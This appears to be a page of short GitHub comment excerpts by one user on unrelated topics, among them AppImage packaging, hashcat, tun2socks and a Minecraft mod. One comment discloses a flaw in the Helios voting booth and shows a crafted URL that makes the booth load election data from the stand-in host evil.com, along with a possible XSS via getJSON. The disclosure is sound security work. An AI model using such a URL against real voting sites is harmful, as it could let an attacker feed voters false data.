redfast00
redfast00
A quick idea: if the instuction cell is 255, we look to the next cell and add that number to 255 and then call the syscall with the sum. We'll...
We hacked some more on it yesterday night, and managed to work around it by putting the binary and all libraries it needs into an AppImage. It's pretty bloated (it...
I read the paper, the version that is deployed still seems to be vulnerable: `https://vote.heliosvoting.org/booth/vote.html?election_url=http://evil.com/get-bad-data` makes requests to `evil.com`.
@benadida ^ is this something you would accept a PR for? Is it okay to just block external URL's?
In particular, line 370 of `heliosbooth/vote.html` still uses `$.getJSON`, so that might still be vulnerable to XSS
The XSS with `getJSON` seems to have been fixed (I can't reproduce it).
So I just pipe hashcat to hashcat then? (trying to avoid too small workloads)
@pazDontExist: could you please be a bit more specific? How would you make it so it floats above the footer?
SSTap is Windows-only I think, but this did give me the idea to look for software that translates SOCKS to TUN. There is [tun2socks](https://github.com/ambrop72/badvpn) I could use that might work....
I'm on `CC: Tweaked 1.80pr1.5` and `plethora 1.1.11`.